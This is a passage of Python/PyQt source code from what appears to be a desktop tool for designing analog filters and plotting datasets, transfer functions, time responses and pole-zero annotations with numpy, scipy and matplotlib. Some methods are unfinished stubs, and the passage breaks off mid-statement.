-1):\n self.dataline_list.setCurrentRow(self.dataline_list.count() - 1)\n except AttributeError:\n pass\n self.updatePlots()\n \n def removeSelectedDataline(self, event):\n selected_row = self.dataline_list.currentRow()\n self.removeDataline(selected_row)\n\n def removeSelectedDataset(self, event):\n selected_row = self.dataset_list.currentRow()\n self.removeDataset(selected_row)\n\n def getInternalDataIndexes(self, datalineRow):\n i = self.dataline_list.currentRow()\n for x in range(self.dataset_list.count()):\n ds = self.dataset_list.item(x).data(Qt.UserRole)\n if(i >= len(self.datalines[x])):\n i = i - len(self.datalines[x])\n else:\n return (x, i)\n return (x, i)\n\n def dragEnterEvent(self, event):\n if(event.mimeData().hasUrls()):\n event.accept()\n else:\n event.ignore()\n\n def dropEvent(self, event):\n self.statusbar.showMessage('Loading files')\n files = [u.toLocalFile() for u in event.mimeData().urls()]\n self.processFiles(files)\n\n def importFiles(self):\n options = QFileDialog.Options()\n # options |= QFileDialog.DontUseNativeDialog\n files, _ = QFileDialog.getOpenFileNames(self,\"Select files\", \"\",\"All Files (*);;CSV files (*.csv);;SPICE output files (*.raw)\", options=options)\n self.processFiles(files)\n\n def processFiles(self, filenamearray):\n for f in filenamearray:\n try:\n ds = Dataset(filepath=f)\n dataset_items_origin = [\n self.dataset_list.item(x).data(Qt.UserRole).origin\n for x in range(self.dataset_list.count())\n ]\n if(ds.origin not in dataset_items_origin):\n self.droppedFiles.append(ds.origin)\n self.addDataset(ds)\n except(ValueError):\n print('Wrong file config')\n self.statusbar.clearMessage()\n\n def openTFDialog(self):\n self.tfd.open()\n self.tfd.tf_title.setFocus()\n\n def resolveTFDialog(self):\n if not self.tfd.validateTF():\n return\n ds = Dataset(filepath='', origin=self.tfd.tf, title=self.tfd.getTFTitle())\n self.addDataset(ds)\n\n def resolveFDialog(self):\n self.tfd.t_error_label.setText(\"Generating... 
Please wait\")\n        QApplication.processEvents()\n        if not self.tfd.validateF():\n            return\n        self.tfd.setFValues()\n        ds = Dataset(filepath='', origin= self.tfd.f, title=self.tfd.getFTitle())\n        self.addDataset(ds)\n        self.tfd.t_error_label.setText(\"Done!\")\n        \n\n    def openResponseDialog(self):\n        self.respd.open()\n        self.respd.input_txt.setFocus()\n\n    def resolveResponseDialog(self):\n        if not(self.respd.validateResponse()):\n            return\n\n        t = self.respd.getTimeDomain()\n        expression = self.respd.getResponseExpression()\n        title = self.respd.getResponseTitle()\n        time_title = title + \"_timebase\"\n        ans_title = title + \"_ans\"\n        \n        if expression == 'step':\n            x = np.heaviside(t, 0.5)\n            _, response = signal.step(self.selected_dataset_data.tf.tf_object, T=t)\n        elif expression == 'delta':\n            delta = lambda t, eps: (1 / (np.sqrt(np.pi) *eps)) * np.exp(-(t/eps)**2) # Gaussian approximation of the delta, used for plotting the input\n            x = delta(t, (t[1] - t[0]))\n            _, response = signal.impulse(self.selected_dataset_data.tf.tf_object, T=t)\n        else:\n            x = eval(expression)\n            response = signal.lsim(self.selected_dataset_data.tf.tf_object , U = x , T = t)[1]\n        \n        self.selected_dataset_data.data[0][time_title] = t\n        self.selected_dataset_data.data[0][title] = x\n        self.selected_dataset_data.data[0][ans_title] = response\n\n        self.selected_dataset_data.fields.append(time_title)\n        self.selected_dataset_data.fields.append(title)\n        self.selected_dataset_data.fields.append(ans_title)\n        \n        self.updateSelectedDataset()\n        self.updateSelectedDataline()\n\n    def buildFilterFromParams(self):\n        if(self.prevFilterType != self.tipo_box.currentIndex()):\n            self.compareapprox_cb.setCurrentIndexes([])\n            self.prevFilterType = self.tipo_box.currentIndex()\n        if self.tipo_box.currentIndex() in [Filter.BAND_PASS, Filter.BAND_REJECT]:\n            wa = [F_TO_W * self.fa_min_box.value(), F_TO_W * self.fa_max_box.value()]\n            wp = [F_TO_W * self.fp_min_box.value(), F_TO_W * self.fp_max_box.value()]\n        else:\n            wa = F_TO_W * self.fa_box.value()\n            wp = F_TO_W * self.fp_box.value()\n        \n        params = {\n            \"name\": self.filtername_box.text(),\n            \"filter_type\": self.tipo_box.currentIndex(),\n            \"approx_type\": self.aprox_box.currentIndex(),\n            \"helper_approx\": self.compareapprox_cb.currentIndexes(),\n            \"helper_N\": self.comp_N_box.value(),\n            \"is_helper\": False,\n            \"define_with\": self.define_with_box.currentIndex(),\n            \"N_min\": self.N_min_box.value(),\n            \"N_max\": self.N_max_box.value(),\n            \"gain\": self.gain_box.value(),\n            \"denorm\": self.denorm_box.value(),\n            \"aa_dB\": self.aa_box.value(),\n            \"ap_dB\": self.ap_box.value(),\n            \"wa\": wa,\n            \"wp\": wp,\n            \"w0\": F_TO_W * self.f0_box.value(),\n            \"bw\": [F_TO_W * self.bw_min_box.value(), F_TO_W * self.bw_max_box.value()],\n            \"gamma\": self.tol_box.value(),\n            \"tau0\": self.tau0_box.value(),\n            \"wrg\": F_TO_W * self.frg_box.value(),\n        }\n        return AnalogFilter(**params)\n    \n    def addFilter(self):\n        newFilter = self.buildFilterFromParams()\n        valid, msg = newFilter.validate()\n        if not valid:\n            self.pmptd.setErrorMsg(msg)\n            self.pmptd.open()\n            self.pmptd.setFocus()\n            return\n        ds = Dataset(filepath='', origin=newFilter, title=self.filtername_box.text())\n        self.filters.append(ds)\n        self.selfil_cb.blockSignals(True)\n        self.stages_selfil_cb.blockSignals(True)\n        self.selfil_cb.addItem(ds.title, ds)\n        self.stages_selfil_cb.addItem(ds.title, ds)\n        self.selfil_cb.blockSignals(False)\n        self.stages_selfil_cb.blockSignals(False)\n        self.chg_filter_btn.setEnabled(True)\n        self.addDataset(ds)\n    \n    def makeFilterTemplateSymmetric(self):\n        fa = [self.fa_min_box.value(), 
self.fa_max_box.value()]\n fp = [self.fp_min_box.value(), self.fp_max_box.value()]\n f0 = 0\n bw = [0, 0]\n if(self.tipo_box.currentIndex() == Filter.BAND_PASS):\n f0 = np.sqrt(fp[0] * fp[1])\n bw[0] = fp[1] - fp[0]\n if(fa[0] * fa[1] != f0**2):\n famincalc = f0**2 / fa[1]\n famaxcalc = f0**2 / fa[0]\n if(famincalc > fa[0]):\n fa[0] = famincalc\n elif(famaxcalc < fa[1]):\n fa[1] = famaxcalc\n bw[1] = fa[1] - fa[0]\n\n elif(self.tipo_box.currentIndex() == Filter.BAND_REJECT):\n f0 = np.sqrt(fa[0] * fa[1])\n bw[0] = fa[1] - fa[0]\n if(fp[0] * fp[1] != f0**2):\n fpmincalc = f0**2 / fp[1]\n fpmaxcalc = f0**2 / fp[0]\n if(fpmincalc > fp[0]):\n fp[0] = fpmincalc\n elif(fpmaxcalc < fp[1]):\n fp[1] = fpmaxcalc \n bw[1] = fp[1] - fp[0]\n\n self.fa_min_box.setValue(fa[0])\n self.fa_max_box.setValue(fa[1])\n self.fp_min_box.setValue(fp[0])\n self.fp_max_box.setValue(fp[1])\n self.f0_box.setValue(f0)\n self.bw_min_box.setValue(bw[0])\n self.bw_max_box.setValue(bw[1])\n\n def changeSelectedFilter(self):\n newFilter = self.buildFilterFromParams()\n valid, msg = newFilter.validate()\n if not valid:\n self.pmptd.setErrorMsg(msg)\n self.pmptd.setFocus()\n return\n temp_datalines = self.selected_dataset_data.datalines\n ds = Dataset('', self.filtername_box.text(), newFilter)\n ds.datalines = temp_datalines\n ds.title = self.filtername_box.text()\n self.selected_dataset_widget.setText(self.filtername_box.text())\n self.selfil_cb.setItemText(self.selfil_cb.currentIndex(), ds.title)\n self.stages_selfil_cb.setItemText(self.selfil_cb.currentIndex(), ds.title)\n self.selected_dataset_widget.setData(Qt.UserRole, ds)\n self.filters[self.selfil_cb.currentIndex()] = ds\n self.populateSelectedDatasetDetails(self.selected_dataset_widget, None)\n\n def updateFilterParametersAvailable(self):\n if self.tipo_box.currentIndex() == Filter.LOW_PASS or self.tipo_box.currentIndex() == Filter.HIGH_PASS:\n for i in range(Filter.LEGENDRE + 1):\n self.aprox_box.model().item(i).setEnabled(True)\n self.compareapprox_cb.model().item(i).setEnabled(True)\n for i in range(Filter.BESSEL, Filter.GAUSS + 1):\n self.aprox_box.model().item(i).setEnabled(False)\n self.compareapprox_cb.model().item(i).setEnabled(False)\n if not self.aprox_box.model().item(self.aprox_box.currentIndex()).isEnabled():\n self.aprox_box.setCurrentIndex(Filter.BUTTERWORTH)\n self.compareapprox_cb.setCurrentIndex(Filter.BUTTERWORTH)\n self.define_with_box.setVisible(False)\n self.label_definewith.setVisible(False)\n self.ap_box.setVisible(True)\n self.label_ap.setVisible(True)\n self.aa_box.setVisible(True)\n self.label_aa.setVisible(True)\n self.fp_box.setVisible(True)\n self.label_fp.setVisible(True)\n self.fa_box.setVisible(True)\n self.label_fa.setVisible(True)\n self.fa_min_box.setVisible(False)\n self.symmetrize_btn.setVisible(False)\n self.label_famin.setVisible(False)\n self.fa_max_box.setVisible(False)\n self.label_famax.setVisible(False)\n self.fp_min_box.setVisible(False)\n self.label_fpmin.setVisible(False)\n self.fp_max_box.setVisible(False)\n self.label_fpmax.setVisible(False)\n self.f0_box.setVisible(False)\n self.label_f0.setVisible(False)\n self.bw_min_box.setVisible(False)\n self.label_bwmin.setVisible(False)\n self.bw_max_box.setVisible(False)\n self.label_bwmax.setVisible(False)\n self.tau0_box.setVisible(False)\n self.label_tau0.setVisible(False)\n self.frg_box.setVisible(False)\n self.label_fRG.setVisible(False)\n self.tol_box.setVisible(False)\n self.label_tolerance.setVisible(False)\n\n elif self.tipo_box.currentIndex() == Filter.BAND_PASS or 
self.tipo_box.currentIndex() == Filter.BAND_REJECT:\n for i in range(Filter.LEGENDRE + 1):\n self.aprox_box.model().item(i).setEnabled(True)\n self.compareapprox_cb.model().item(i).setEnabled(True)\n for i in range(Filter.BESSEL, Filter.GAUSS + 1):\n self.aprox_box.model().item(i).setEnabled(False)\n self.compareapprox_cb.model().item(i).setEnabled(False)\n if not self.aprox_box.model().item(self.aprox_box.currentIndex()).isEnabled():\n self.aprox_box.setCurrentIndex(Filter.BUTTERWORTH)\n self.compareapprox_cb.setCurrentIndex(Filter.BUTTERWORTH)\n self.define_with_box.setVisible(True)\n self.label_definewith.setVisible(True)\n self.ap_box.setVisible(True)\n self.label_ap.setVisible(True)\n self.aa_box.setVisible(True)\n self.label_aa.setVisible(True)\n self.fp_box.setVisible(False)\n self.label_fp.setVisible(False)\n self.fa_box.setVisible(False)\n self.label_fa.setVisible(False)\n self.tau0_box.setVisible(False)\n self.label_tau0.setVisible(False)\n self.frg_box.setVisible(False)\n self.label_fRG.setVisible(False)\n self.tol_box.setVisible(False)\n self.label_tolerance.setVisible(False)\n\n if self.define_with_box.currentIndex() == Filter.TEMPLATE_FREQS:\n self.fa_min_box.setVisible(True)\n self.label_famin.setVisible(True)\n self.fa_max_box.setVisible(True)\n self.label_famax.setVisible(True)\n self.fp_min_box.setVisible(True)\n self.label_fpmin.setVisible(True)\n self.fp_max_box.setVisible(True)\n self.label_fpmax.setVisible(True)\n self.f0_box.setVisible(False)\n self.label_f0.setVisible(False)\n self.bw_min_box.setVisible(False)\n self.label_bwmin.setVisible(False)\n self.bw_max_box.setVisible(False)\n self.label_bwmax.setVisible(False)\n self.symmetrize_btn.setVisible(True)\n\n if self.define_with_box.currentIndex() == Filter.F0_BW:\n self.fa_min_box.setVisible(False)\n self.label_famin.setVisible(False)\n self.fa_max_box.setVisible(False)\n self.label_famax.setVisible(False)\n self.fp_min_box.setVisible(False)\n self.label_fpmin.setVisible(False)\n self.fp_max_box.setVisible(False)\n self.label_fpmax.setVisible(False)\n self.f0_box.setVisible(True)\n self.label_f0.setVisible(True)\n self.bw_min_box.setVisible(True)\n self.label_bwmin.setVisible(True)\n self.bw_max_box.setVisible(True)\n self.label_bwmax.setVisible(True)\n self.symmetrize_btn.setVisible(False)\n \n elif self.tipo_box.currentIndex() == Filter.GROUP_DELAY:\n for i in range(Filter.LEGENDRE + 1):\n self.aprox_box.model().item(i).setEnabled(False)\n self.compareapprox_cb.model().item(i).setEnabled(False)\n for i in range(Filter.BESSEL, Filter.GAUSS + 1):\n self.aprox_box.model().item(i).setEnabled(True)\n self.compareapprox_cb.model().item(i).setEnabled(True)\n if not self.aprox_box.model().item(self.aprox_box.currentIndex()).isEnabled():\n self.aprox_box.setCurrentIndex(Filter.BESSEL)\n self.compareapprox_cb.setCurrentIndex(Filter.BESSEL)\n \n self.define_with_box.setVisible(False)\n self.label_definewith.setVisible(False)\n self.ap_box.setVisible(False)\n self.label_ap.setVisible(False)\n self.aa_box.setVisible(False)\n self.label_aa.setVisible(False)\n self.fp_box.setVisible(False)\n self.label_fp.setVisible(False)\n self.fa_box.setVisible(False)\n self.label_fa.setVisible(False)\n self.fa_min_box.setVisible(False)\n self.label_famin.setVisible(False)\n self.fa_max_box.setVisible(False)\n self.label_famax.setVisible(False)\n self.fp_min_box.setVisible(False)\n self.label_fpmin.setVisible(False)\n self.fp_max_box.setVisible(False)\n self.label_fpmax.setVisible(False)\n self.f0_box.setVisible(False)\n 
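# Group-delay approximations only need tau0, the group-delay frequency and a tolerance, so the remaining template boxes are hidden below.\n            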
self.label_f0.setVisible(False)\n            self.bw_min_box.setVisible(False)\n            self.label_bwmin.setVisible(False)\n            self.bw_max_box.setVisible(False)\n            self.label_bwmax.setVisible(False)\n            self.tau0_box.setVisible(True)\n            self.label_tau0.setVisible(True)\n            self.frg_box.setVisible(True)\n            self.label_fRG.setVisible(True)\n            self.tol_box.setVisible(True)\n            self.label_tolerance.setVisible(True)\n            self.symmetrize_btn.setVisible(False)\n\n    def condition_canvas(self, canvas, xlabel, ylabel, xscale='linear', yscale='linear', grid=True):\n        canvas.ax.clear()\n        canvas.ax.grid(grid, which=\"both\", linestyle=':')\n        canvas.ax.set_xlabel(xlabel)\n        canvas.ax.set_ylabel(ylabel)\n        canvas.ax.set_xscale(xscale)\n        canvas.ax.set_yscale(yscale)\n        canvas.ax.xaxis.label.set_size(self.plt_labelsize_sb.value())\n        canvas.ax.yaxis.label.set_size(self.plt_labelsize_sb.value())\n        for label in (canvas.ax.get_xticklabels() + canvas.ax.get_yticklabels()):\n            label.set_fontsize(self.plt_ticksize_sb.value())\n\n    def updateFilterPlots(self):\n        pass\n\n    def updateFilterStages(self):\n        pass\n\n    def stage_sel_changed(self):\n        pass\n    \n    def updateSelectedPolesFromPlot(self, s):\n        pass\n\n    def updateSelectedZerosFromPlot(self, s):\n        pass\n\n    def addFilterStage(self):\n        pass\n\n    def swapStagesUpwards(self):\n        pass\n\n    def swapStagesDownwards(self):\n        pass\n\n    def orderStagesBySos(self):\n        pass\n\n    def removeFilterStage(self):\n        pass\n\n    def formatPoleAnnotation(self, sel):\n        sel.annotation.set_text('Pole {:d}\\n{:.2f}+j{:.2f}\\nQ={:.2f}'.format(sel.index, sel.target[0], sel.target[1], self.calcQ(sel.target)))\n\n    def formatZeroAnnotation(self, sel):\n        if(True or sel.target[0] == 0 and sel.target[1] == 0):\n            sel.annotation.set_text('Zero {:d}\\n{:.2f}+j{:.2f}'.format(sel.index, sel.target[0], sel.target[1]))\n        else:\n            sel.annotation.set_text('Zero {:d}\\n{:.2f}+j{:.2f}\\nQ={:.2f}'.format(sel.index, sel.target[0], sel.target[1], self.calcQ(sel.target)))\n\n    def calcQ(self, sing):\n        if(isinstance(sing, (list, tuple, np.ndarray))):\n            sing = sing[0] + sing[1]*1j\n        if(sing.real == 0):\n            return inf\n        elif(sing.real > 0):\n            return -1\n        else:\n            return np.abs(sing)/(- 2 * sing.real)\n\n    def updateStagePlots(self):\n        pass\n\n    def clearCanvas(self, canvas):\n        canvas.ax.clear()\n        canvas.ax.grid(True, which=\"both\", linestyle=':')\n\n    def openCaseDialog(self):\n        self.csd.open()\n        self.csd.populate(ds = self.selected_dataset_data)\n        # self.tfd.tf_title.setFocus()\n\n    def resolveCSDialog(self):\n        first_case = int(self.csd.case_first_cb.currentIndex())\n        last_case = int(self.csd.case_last_cb.currentIndex())\n        casenum = len(self.selected_dataset_data.data)\n        dli = 0\n        for x in range(self.dataset_list.count()):\n            ds = self.dataset_list.item(x).data(Qt.UserRole)\n            dli = dli + len(self.datalines[x])\n            if(ds.origin == self.selected_dataset_data.origin):\n                break\n        color_iter = 0\n        for case in range(first_case, min(last_case + 1, casenum)):\n            dl = self.selected_dataset_data.create_dataline(case)\n            qlwt = QListWidgetItem()\n            dl.plots = self.csd.case_render_cb.currentIndex()\n            dl.transform = self.csd.case_transform_cb.currentIndex()\n            dl.xsource = self.csd.case_xdata_cb.currentText()\n            dl.xscale = self.csd.case_xscale_sb.value()\n            dl.xoffset = self.csd.case_xoffset_sb.value()\n            dl.ysource = self.csd.case_ydata_cb.currentText()\n            dl.yscale = self.csd.case_yscale_sb.value()\n            dl.yoffset = self.csd.case_yoffset_sb.value()\n            if(self.csd.case_randomcol_rb.isChecked()):\n                dl.color = 
\"#\" + ''.join([random.choice('0123456789ABCDEF') for i in range(6)])\n            elif(self.csd.case_presetcol_rb.isChecked()):\n                colorpalette_i = self.csd.case_palettecol_cb.currentIndex()\n                colorpalette = self.csd.COLOR_LIST[colorpalette_i]\n                dl.color = colorpalette[color_iter]\n                color_iter += 1\n                if(color_iter == len(colorpalette)):\n                    color_iter = 0\n            else:\n                dl.color = self.csd.color\n            dl.linestyle = self.csd.case_style_cb.currentText()\n            dl.linewidth = self.csd.case_linewidth_sb.value()\n            dl.markerstyle = self.csd.case_marker_cb.currentText()\n            dl.markersize = self.csd.case_markersize_sb.value()\n            if(self.csd.case_inforname_rb.isChecked()):\n                dstitle = self.selected_dataset_data.title\n                dscases = self.selected_dataset_data.casenames\n                if(case < len(dscases)):\n                    dl.name = dstitle + ' ' + dscases[case]\n            qlwt.setText(dl.name)\n            dl.name = dl.name if self.csd.case_addlegend_cb.isChecked() else '_' + dl.name\n            qlwt.setData(Qt.UserRole, dl)\n            self.dataline_list.insertItem(dli, qlwt)\n            self.datalines[self.dataset_list.currentRow()].append(dl)\n        self.updatePlots()\n\n    def populateSelectedDatasetDetails(self, listitemwidget, qlistwidget):\n        if(not listitemwidget):\n            self.setDatasetControlsStatus(False)\n            self.ds_title_edit.setText('')\n            self.ds_casenum_lb.setText('0')\n            self.ds_info_lb.setText('')\n            return\n        self.setDatasetControlsStatus(True)\n        self.ds_title_edit.setText(listitemwidget.text())\n        self.selected_dataset_widget = listitemwidget\n        self.selected_dataset_data = listitemwidget.data(Qt.UserRole)\n        isTF = self.selected_dataset_data.type in ['TF', 'filter']\n        self.ds_poleszeros_btn.setEnabled(isTF)\n        self.resp_btn.setEnabled(isTF)\n        self.ds_casenum_lb.setText(str(len(self.selected_dataset_data.data)))\n        self.ds_caseadd_btn.setVisible(len(self.selected_dataset_data.data) > 1)\n        self.ds_info_lb.setText(self.selected_dataset_data.miscinfo)\n\n        # fill in the filter parameter boxes\n        if(self.selected_dataset_data.type == 'filter'):\n            self.populateSelectedFilterDetails()\n\n    def populateSelectedFilterDetails(self, index=-2):\n        pass\n\n    def updateSelectedDatasetName(self):\n        new_title = self.ds_title_edit.text()\n        self.selected_dataset_widget.setText(new_title)\n        self.selected_dataset_data.title = new_title\n        if(self.selected_dataset_data.type == 'filter'):\n            self.selfil_cb.setItemText(self.selfil_cb.currentIndex(), new_title)\n            self.stages_selfil_cb.setItemText(self.stages_selfil_cb.currentIndex(), new_title)\n            self.filtername_box.setText(new_title)\n\n    def populateSelectedDatalineDetails(self, listitemwidget, qlistwidget):\n        if(not listitemwidget):\n            self.setDatalineControlsStatus(False)\n            self.dl_name_edit.setText('')\n            return\n        self.setDatalineControlsStatus(True)\n        self.dl_xscale_sb.blockSignals(True)\n        self.dl_yscale_sb.blockSignals(True)\n        self.dl_xoffset_sb.blockSignals(True)\n        self.dl_yoffset_sb.blockSignals(True)\n        self.dl_linewidth_sb.blockSignals(True)\n        self.dl_markersize_sb.blockSignals(True)\n        self.dl_savgol_wlen.blockSignals(True)\n        self.dl_savgol_ord.blockSignals(True)\n\n        self.selected_dataline_widget = listitemwidget\n        self.selected_dataline_data = listitemwidget.data(Qt.UserRole) # dataline payload attached to the list item\n        dl_type = self.selected_dataline_data.dataset.type\n\n        self.dl_transform_cb.clear()\n        if (dl_type == 'function'):\n            self.dl_type_flag = 1\n            opciones = [\"None\", \"1st derivative\", \"2nd derivative\"]\n        elif (dl_type == 'line' or dl_type == 'pt'):\n            self.dl_type_flag = 2\n            opciones = [\"None\"]\n        else:\n            self.dl_type_flag = 0\n            opciones = [\"None\", \"|.|\", \"Arg(.)\", \"unwrap Arg(.)\", \"20log(.)\", 
\"20log(|.|)\", \"unwrap(.)\"]\n \n self.dl_transform_cb.addItems(opciones)\n\n self.dl_name_edit.setText(self.selected_dataline_widget.text())\n self.dl_render_cb.setCurrentIndex(self.selected_dataline_data.plots)\n \n self.dl_xdata_cb.clear()\n self.dl_ydata_cb.clear()\n self.dl_xdata_cb.addItems(self.selected_dataline_data.dataset.fields)\n self.dl_ydata_cb.addItems(self.selected_dataline_data.dataset.fields)\n \n self.dl_transform_cb.setCurrentIndex(self.selected_dataline_data.transform)\n self.dl_xdata_cb.setCurrentText(self.selected_dataline_data.xsource)\n self.dl_xscale_sb.setValue(self.selected_dataline_data.xscale)\n self.dl_xoffset_sb.setValue(self.selected_dataline_data.xoffset)\n self.dl_ydata_cb.setCurrentText(self.selected_dataline_data.ysource)\n self.dl_yscale_sb.setValue(self.selected_dataline_data.yscale)\n self.dl_yoffset_sb.setValue(self.selected_dataline_data.yoffset)\n self.dl_color_edit.setText(self.selected_dataline_data.color)\n self.dl_style_cb.setCurrentText(self.selected_dataline_data.linestyle)\n self.dl_linewidth_sb.setValue(self.selected_dataline_data.linewidth)\n self.dl_marker_cb.setCurrentText(self.selected_dataline_data.markerstyle)\n self.dl_markersize_sb.setValue(self.selected_dataline_data.markersize)\n self.dl_color_label.setStyleSheet(f'background-color: {self.selected_dataline_data.color}')\n self.dl_savgol_wlen.setValue(self.selected_dataline_data.savgolwindow)\n self.dl_savgol_ord.setValue(self.selected_dataline_data.savgolord)\n \n self.dl_xscale_sb.blockSignals(False)\n self.dl_yscale_sb.blockSignals(False)\n self.dl_xoffset_sb.blockSignals(False)\n self.dl_yoffset_sb.blockSignals(False)\n self.dl_linewidth_sb.blockSignals(False)\n self.dl_markersize_sb.blockSignals(False)\n self.dl_savgol_wlen.blockSignals(False)\n self.dl_savgol_ord.blockSignals(False)\n\n def updateSelectedDataline(self):\n self.saveFile(True)\n if(not self.selected_dataline_widget):\n return\n new_name = self.dl_name_edit.text()\n self.selected_dataline_widget.setText(new_name)\n self.selected_dataline_data.name = new_name\n self.selected_dataline_data.plots = self.dl_render_cb.currentIndex()\n self.selected_dataline_data.transform = self.dl_transform_cb.currentIndex()\n self.selected_dataline_data.xsource = self.dl_xdata_cb.currentText()\n self.selected_dataline_data.xscale = self.dl_xscale_sb.value()\n self.selected_dataline_data.xoffset = self.dl_xoffset_sb.value()\n self.selected_dataline_data.ysource = self.dl_ydata_cb.currentText()\n self.selected_dataline_data.yscale = self.dl_yscale_sb.value()\n self.selected_dataline_data.yoffset = self.dl_yoffset_sb.value()\n self.selected_dataline_data.color = self.dl_color_edit.text()\n self.selected_dataline_data.linestyle = self.dl_style_cb.currentText()\n self.selected_dataline_data.linewidth = self.dl_linewidth_sb.value()\n self.selected_dataline_data.markerstyle = self.dl_marker_cb.currentText()\n self.selected_dataline_data.markersize = self.dl_markersize_sb.value()\n self.selected_dataline_data.savgolwindow = self.dl_savgol_wlen.value()\n self.selected_dataline_data.savgolord = self.dl_savgol_ord.value()\n self.populateSelectedDatalineDetails(self.selected_dataline_widget, None)\n self.updatePlots()\n\n \n def openColorPicker(self, origin):\n dialog = QColorDialog(self)\n dialog.setCurrentColor(Qt.red)\n dialog.setOption(QColorDialog.ShowAlphaChannel)\n dialog.open()\n dialog.currentColorChanged.connect(self.updateDatalineColor)\n\n def updateDatalineColor(self, color):\n self.dl_color_edit.setText(color.name())\n 
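# Keep the colour swatch in sync with the hex value shown in the edit box.\n        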
self.dl_color_label.setStyleSheet(f'background-color: {color.name()}')\n self.selected_dataline_data.color = color.name()\n self.updatePlots()\n\n def setDatasetControlsStatus(self, enabled=True):\n self.ds_title_edit.setEnabled(enabled)\n self.ds_addline_btn.setEnabled(enabled)\n self.ds_caseadd_btn.setEnabled(enabled)\n self.ds_remove_btn.setEnabled(enabled)\n\n def setDatalineControlsStatus(self, enabled=True):\n self.dl_name_edit.setEnabled(enabled)\n self.dl_render_cb.setEnabled(enabled)\n self.dl_transform_cb.setEnabled(enabled)\n self.dl_xdata_cb.setEnabled(enabled)\n self.dl_xscale_sb.setEnabled(enabled)\n self.dl_xoffset_sb.setEnabled(enabled)\n self.dl_ydata_cb.setEnabled(enabled)\n self.dl_yscale_sb.setEnabled(enabled)\n self.dl_yoffset_sb.setEnabled(enabled)\n self.dl_color_edit.setEnabled(enabled)\n self.dl_color_pickerbtn.setEnabled(enabled)\n self.dl_style_cb.setEnabled(enabled)\n self.dl_linewidth_sb.setEnabled(enabled)\n self.dl_marker_cb.setEnabled(enabled)\n self.dl_markersize_sb.setEnabled(enabled)\n self.dl_savgol_wlen.setEnabled(enabled)\n self.dl_savgol_ord.setEnabled(enabled)\n self.dl_remove_btn.setEnabled(enabled)\n\n def getPlotFromIndex(self, plotnum):\n x = plotnum\n tab = 0\n for tab_plots in self.plots_canvases:\n if(x - len(tab_plots) >= 0):\n tab += 1\n x -= len(tab_plots)\n else:\n break\n return self.plots_canvases[tab][x]\n\n def autoscalePlots(self):\n processedCanvas = [x.canvas for x in self.plots_canvases[self.tabbing_plots.currentIndex()]]\n for canvas in processedCanvas:\n canvas.ax.margins(self.plt_marginx.value(), self.plt_marginy.value())\n canvas.ax.relim()\n canvas.ax.autoscale()\n self.updatePlots()\n\n def changeLabelSize(self):\n # plt.rcParams.update({'font.size': self.plt_labelsize_sb.value()})\n self.updatePlots()\n\n def updatePlots(self):\n self.saveFile(True)\n processedCanvas = [x.canvas for x in self.plots_canvases[self.tabbing_plots.currentIndex()]]\n for canvas in processedCanvas:\n plotlist = []\n for artist in canvas.ax.lines + canvas.ax.collections:\n artist.remove()\n for x in range(self.dataset_list.count()):\n ds = self.dataset_list.item(x).data(Qt.UserRole)\n for dl in ds.datalines:\n dl_canvas = self.getPlotFromIndex(dl.plots).canvas\n if(dl_canvas == canvas):\n \n for label in (canvas.ax.get_xticklabels() + canvas.ax.get_yticklabels()):\n label.set_fontsize(self.plt_ticksize_sb.value())\n canvas.ax.xaxis.label.set_size(self.plt_labelsize_sb.value())\n canvas.ax.yaxis.label.set_size(self.plt_labelsize_sb.value())\n canvas.ax.title.set_size(self.plt_titlesize_sb.value())\n\n x, y = ds.get_datapoints(dl.xsource, dl.ysource, dl.casenum)\n\n if(self.dl_type_flag == 0):\n if(dl.transform == 1):\n y = np.abs(y)\n elif(dl.transform == 2):\n y = np.angle(y, deg=True)\n elif(dl.transform == 3):\n y = np.unwrap(np.angle(y, deg=True), period=360)\n elif(dl.transform == 4):\n y = 20 * np.log10(y)\n elif(dl.transform == 5):\n y = 20 * np.log10(np.abs(y))\n elif(dl.transform == 6):\n y = np.unwrap(y, period=360)\n else:\n y = np.real(y)\n elif(self.dl_type_flag == 1):\n if(dl.transform == 1):\n x, y = self.derivate(x, y)\n elif(dl.transform == 2):\n x, y = self.derivate(x, y)\n x, y = self.derivate(x, y)\n else:\n y = np.real(y)\n elif(self.dl_type_flag == 2):\n y = np.real(y)\n\n if(dl.transform in [2,3,6]):\n canvas.ax.yaxis.set_major_locator(ticker.MaxNLocator(nbins='auto', steps=[1.8,2.25,4.5,9]))\n else:\n canvas.ax.yaxis.set_major_locator(ticker.AutoLocator())\n\n try:\n savgolw = int(dl.savgolwindow)\n if(savgolw <= len(x)):\n 
savgolo = int(dl.savgolord)\n                            y = y if savgolw <= savgolo else savgol_filter(y, savgolw, savgolo)\n                        except ValueError:\n                            pass\n\n                        try:\n                            line, = canvas.ax.plot(\n                                x * dl.xscale + dl.xoffset,\n                                y * dl.yscale + dl.yoffset,\n                                linestyle = LINE_STYLES[dl.linestyle],\n                                linewidth = dl.linewidth,\n                                marker = MARKER_STYLES[dl.markerstyle],\n                                markersize = dl.markersize,\n                                color = dl.color,\n                                label = dl.name,\n                            )\n                            if(dl.name != '' and dl.name[0] != '_'):\n                                plotlist.append(line)\n                        except ValueError:\n                            self.statusbar.showMessage('Wrong data source matching', 2000)\n            if(self.plt_legendpos.currentText() == 'None'):\n                if(canvas.ax.get_legend() is not None):\n                    canvas.ax.get_legend().remove()\n            else:\n                canvas.ax.legend(handles=plotlist, fontsize=self.plt_legendsize_sb.value(), loc=self.plt_legendpos.currentIndex())\n            if(self.plt_grid.isChecked()):\n                canvas.ax.grid(True, which=\"both\", linestyle=':')\n            else:\n                canvas.ax.grid(False)\n\n            try:\n                canvas.draw()\n            except (ParseSyntaxException, ValueError):\n                pass\n\n\n    #Updates and plots texts.\n    def updateTexts(self):\n        if self.textDialog.textList.count() and self.textDialog.textList.selectedItems():\n            self.textDialog.errorMsgTxtDialog.setVisible(False)\n            currentTextList = self.textDialog.textList.currentItem()\n            currentTextIndex = self.textDialog.textList.row(currentTextList) # Detect the row of selected text.\n            currentText = self.textDialog.textListArray[currentTextIndex]\n            \n            currentText.title = self.textDialog.textTitle.text()\n            if currentText.title: # Set title only if not empty\n                currentTextList.setText(currentText.title)  \n            currentText.x = self.textDialog.xValueText.value()\n            currentText.y = self.textDialog.yValueText.value()\n            currentText.text = self.textDialog.text.toPlainText()\n            #currentText.color = \n            currentText.size = self.textDialog.fontSize.value()\n            currentText.ha = self.textDialog.HA.currentText()\n            currentText.va = self.textDialog.VA.currentText()\n            currentText.rotation = self.textDialog.textRotation.value()\n            currentText.weight = self.textDialog.fontWeight.currentText()\n            currentText.style = self.textDialog.style.currentText()\n            currentText.opacity = 